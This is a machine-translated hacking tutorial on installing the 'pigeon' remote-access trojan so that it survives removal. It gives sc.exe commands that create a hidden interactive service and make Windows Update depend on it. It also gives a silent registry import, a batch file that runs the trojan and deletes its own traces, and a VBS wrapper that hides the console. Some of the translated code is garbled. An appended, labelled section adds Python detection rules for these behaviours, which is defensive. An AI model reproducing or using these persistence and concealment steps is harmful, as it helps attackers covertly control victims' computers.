Soon after the official launch of this method, I was inspired by the Radmin configuration and had no technical skills. I never dared to say it to everyone for fear of jokes, so laruence would not have to watch it.
Now let's talk about the subject:
Our goal is:
Go through official kill and click it to actively defend against the undead pigeon
Preparation tools:
Pigeon Server
IcoSprite icon changer;
SC .exe adds and deletes a change tool;
Winrar
Program features:
Self-extract mode, double-click
Production process:
1. Configure the pigeon server by yourself. Do not fill in [startup Item settings] here during configuration, do not write it into the registry, or start it with a service. Others are what you like.
2. Use SC to create a service
Run CMD. EXE and run it in the system32 directory.
SC .exe create huigezi BinPath = "% systemroot % \ system32 \ gezi.exe" type = own type = interact start = auto DisplayName = "gezi"
'This statement uses SC to create a service named huigezi, the path Binpath is "% systemroot % \ system32 \ gezi.exe", and the type is own and interact, start is automatic, and DisplayName is "gezi ".
SC .exe descript_ion huigezi "undead pigeon"
'Change the description of the huigezi service to "undead pigeon"
SC config wuauserv depend = huigezi
'Configure huigezi so that the wuauserv service depends on it (wuauserv can be changed to another service as you prefer; here wuauserv is the system's Automatic Updates service, used by the Windows Update website).
The purpose here is to confuse the administrator so that they do not dare to stop the generated service easily. You can also add more points on your own.
3. export these data from the Registry. My personal experience is: Registry monitoring, such as rising star and clicking bar, will not trigger alarms on the imported registry. We will name it 1.reg.
4. Create a BAT file and name it update. bat.
@ Regedit/s % systemroot % \ system32 \ 1.reg
@ % Systemroot % \ system32 \ gezi.exe
@ Del/q/f/s % systemroot % \ system32 \ 1.reg
@ Del/q/f/s % systemroot % \ system32 \ Update. vbs
@ Del/q/f/s % systemroot % \ system32 \ Update. bat
5. Create a vbs and name it update. vbs.
The purpose is to run the contents of the bat file in quiet mode, so that no cmd window pops up, which adds a lot of concealment.
Write the following code:
On Error Resume Next
Set wshshell = createobject ("wscript _. shell ")
A = wshshell. run ("cmd.exe/C % systemroot % \ system32 \ Update. bat", 0, TRUE)
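Seen from the defender's side, the steps above leave a recognisable trail in process-creation telemetry. The following is an added example, not part of the original post: it flags the four behaviours described (interactive auto-start service creation, a changed service dependency, a silent registry import, a script host launching a batch file from system32) and escalates only when several co-occur on one host. The event tuple layout, rule names, host names and sample events are assumptions constructed for illustration.

```python
import re

# Rules over process-creation telemetry (e.g. Sysmon Event ID 1); names are this example's own.
RULES = {
    "service_create_interactive_autostart": lambda e: e["image"] == "sc.exe"
        and " create " in e["cmd"] and "type= interact" in e["cmd"] and "start= auto" in e["cmd"],
    "service_dependency_changed": lambda e: e["image"] == "sc.exe"
        and re.search(r"\bconfig \S+ depend=", e["cmd"]) is not None,
    "silent_registry_import": lambda e: e["image"] == "regedit.exe"
        and re.search(r" /s \S+\.reg\b", e["cmd"]) is not None,
    "script_host_runs_batch_from_system32": lambda e: e["parent"] in ("wscript.exe", "cscript.exe")
        and e["image"] == "cmd.exe" and re.search(r"system32\\\S+\.bat\b", e["cmd"]) is not None,
}

def normalise(event):
    """Lower-case, collapse whitespace, and canonicalise 'key = value' to 'key= value'."""
    host, parent, image, cmd = event
    cmd = re.sub(r"\s+", " ", cmd.lower()).strip()
    cmd = re.sub(r"\s*=\s*", "= ", cmd)
    return {"host": host, "parent": parent.lower(), "image": image.lower(), "cmd": cmd}

def detect(events):
    """Return {host: sorted list of rule names that fired on that host}."""
    hits = {}
    for raw in events:
        e = normalise(raw)
        for name, rule in RULES.items():
            if rule(e):
                hits.setdefault(e["host"], set()).add(name)
    return {h: sorted(r) for h, r in hits.items()}

def high_confidence(events, threshold=3):
    """Hosts where several distinct behaviours co-occur; one alone is common admin activity."""
    return sorted(h for h, r in detect(events).items() if len(r) >= threshold)

# Constructed sample events (host, parent image, image, command line); not real logs.
SAMPLE = [
    ("WS01", "cmd.exe", "sc.exe", r'sc create examplesvc binPath= "C:\Windows\System32\example.exe" type= own type= interact start= auto'),
    ("WS01", "cmd.exe", "sc.exe", r"SC  config wuauserv depend = examplesvc"),
    ("WS01", "wscript.exe", "cmd.exe", r"cmd.exe /C C:\Windows\System32\update.bat"),
    ("WS01", "cmd.exe", "regedit.exe", r"regedit /s C:\Windows\System32\1.reg"),
    ("WS02", "cmd.exe", "sc.exe", r"sc config spooler depend= rpcss"),
    ("WS02", "services.exe", "cmd.exe", r"cmd.exe /c C:\Tools\backup.bat"),
]

if __name__ == "__main__":
    print(detect(SAMPLE), high_confidence(SAMPLE))
```

A single rule firing (as on WS02) is routine administration; the correlation threshold is what separates it from the full sequence.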